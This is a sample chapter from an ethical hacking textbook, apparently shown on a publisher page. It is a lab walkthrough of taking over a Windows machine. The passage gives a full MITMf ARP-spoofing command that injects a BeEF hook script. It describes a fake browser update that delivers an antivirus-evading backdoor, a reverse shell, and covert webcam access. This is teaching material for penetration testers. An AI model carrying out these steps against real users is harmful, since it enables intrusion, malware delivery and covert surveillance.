Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon
Arrow up icon
GO TO TOP
Learn Ethical Hacking from Scratch

You're reading from   Learn Ethical Hacking from Scratch Your stepping stone to penetration testing

Arrow left icon
Product type Paperback
Published in Jul 2018
Publisher Packt
ISBN-13 9781788622059
Length 564 pages
Edition 1st Edition
Languages
Arrow right icon
Author (1):
Arrow left icon
Zaid Sabih Zaid Sabih
Author Profile Icon Zaid Sabih
Zaid Sabih
Arrow right icon
View More author details
Toc

Table of Contents (24) Chapters Close

Preface 1. Introduction FREE CHAPTER 2. Setting Up a Lab 3. Linux Basics 4. Network Penetration Testing 5. Pre-Connection Attacks 6. Network Penetration Testing - Gaining Access 7. Post-Connection Attacks 8. Man-in-the-Middle Attacks 9. Network Penetration Testing, Detection, and Security 10. Gaining Access to Computer Devices 11. Scanning Vulnerabilities Using Tools 12. Client-Side Attacks 13. Client-Side Attacks - Social Engineering 14. Attack and Detect Trojans with BeEF 15. Attacks Outside the Local Network 16. Post Exploitation 17. Website Penetration Testing 18. Website Pentesting - Information Gathering 19. File Upload, Code Execution, and File Inclusion Vulnerabilities 20. SQL Injection Vulnerabilities 21. Cross-Site Scripting Vulnerabilities 22. Discovering Vulnerabilities Automatically Using OWASP ZAP 23. Other Books You May Enjoy

A glimpse of hacking

In the coming sections, we are going to learn how to install the operating systems and programs needed for hacking. We will then learn some basics about hacking, and how to use the operating systems involved. Before we start, I'd like to give you the gist of what you're going to be able to do by the end of this book. In this section, we are going to go through an example of hacking a Windows computer from a Linux machine.

Don't worry about how we installed these machines or how to run these commands; right now, this is just an example. In the future, we're going to break this into steps, and you will see exactly how to run the attack. You will also learn about how the attack works, and how to protect yourself from such an attack.

Browser exploitation framework

Now, we are going to use a program called Browser Exploitation Framework (BeEF):

  1. We're going to launch BeEF XSS Framework. It uses JavaScript code to hook a target computer; once a computer is hooked, we'll be able to run a number of commands. Following is a screenshot of how it looks:
  1. To run the commands, we will use a man-in-the-middle attack to automatically inject the hook code for BeEF. We will use a tool called MITMf to perform an ARP spoofing attack. We will give it the network interface, gateway, and target IP address, which is the address of the Windows machine.
  2. Next, we will tell MITMf that we want it to inject a JavaScript URL, and give it the location where the hook is stored. The code will look something like this:
mitmf --arp --spoof -i eth0 --gateway 10.0.2.1 --target 10.0.2.5 --inject --js-url http://10.0.2.15:3000/hook.js
  1. Once this is done, hit Enter, and it will run successfully. Its output is shown here:
  1. This looks very complicated; we don't know where we got the options from, so it probably all looks very confusing in the preceding screenshot. Again, don't worry; we will discuss it in detail later on, and it will become easy for you. Right now, all we need to understand is that this program is going to inject the hook code; the code allows BeEF to hack into the computer, into the browser used by the target person, and the code can run without the person even knowing.
  1. Now, go to the Windows machine and run the web browser. We're just going to go to any website, such as Google or Bing.
  2. If you go back to the Kali machine, you'll see that we have the IP address of the target person under Hooked Browsers, and, if you click on the Commands tab, you'll see a large number of categories, with commands that you can run on the target computer. These are shown in the following screenshot:
  1. Let's display a fake notification bar to the target telling them there's a new update, so click on Social Engineering | Fake Notification Bar (Firefox), as shown in the following screenshot:
  1. This is going to show the target person that there's a new update, and, once they have installed the update, we can hack into their computer. Now, let's configure the fake notification bar to install a backdoor once the user clicks on it.
  2. We have a ready-made backdoor that's not detectable by antivirus programs (you will see how to do that in upcoming chapters). We will store that backdoor, and call it update.exe.
  1. Next, we will click on Execute. Now, before we run the update, we will have to listen to incoming connections to connect to the target computer, once the victim tries to update their computers. Now, if we hit Execute on the fake notification bar command, the bar will be displayed in the target's browser, as shown in the following screenshot:
  1. In the preceding screenshot, Firefox is showing that there is a critical update, and you need to click on Install plug-in to install that update. Once you have clicked on it, and you can see that it has downloaded an update file, save it, and then run the update.
  2. If we go back to the Kali machine, we'll see that we managed to get a reverse session from the Windows machine. So, let's interact with that computer; we will basically have full control over it:

Now, let's see how to access the target computer's webcam.

Accessing the target computer's webcam

To access the webcam, we are going to use a plugin that comes with Meterpreter; we will use the webcam_stream command.

When we hit Enter, we will be able to turn the webcam on. It is a webcam that's actually attached to the Windows machine; we have hacked into the Windows machine, and we can do anything we want on it. Again, this is just an example of one attack that we're going to use. We're going to perform many more attacks like this, and all of them are going to allow us to gain full control over the target system.

You have been reading a chapter from
Learn Ethical Hacking from Scratch
Published in: Jul 2018
Publisher: Packt
ISBN-13: 9781788622059
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at $19.99/month. Cancel anytime
Banner background image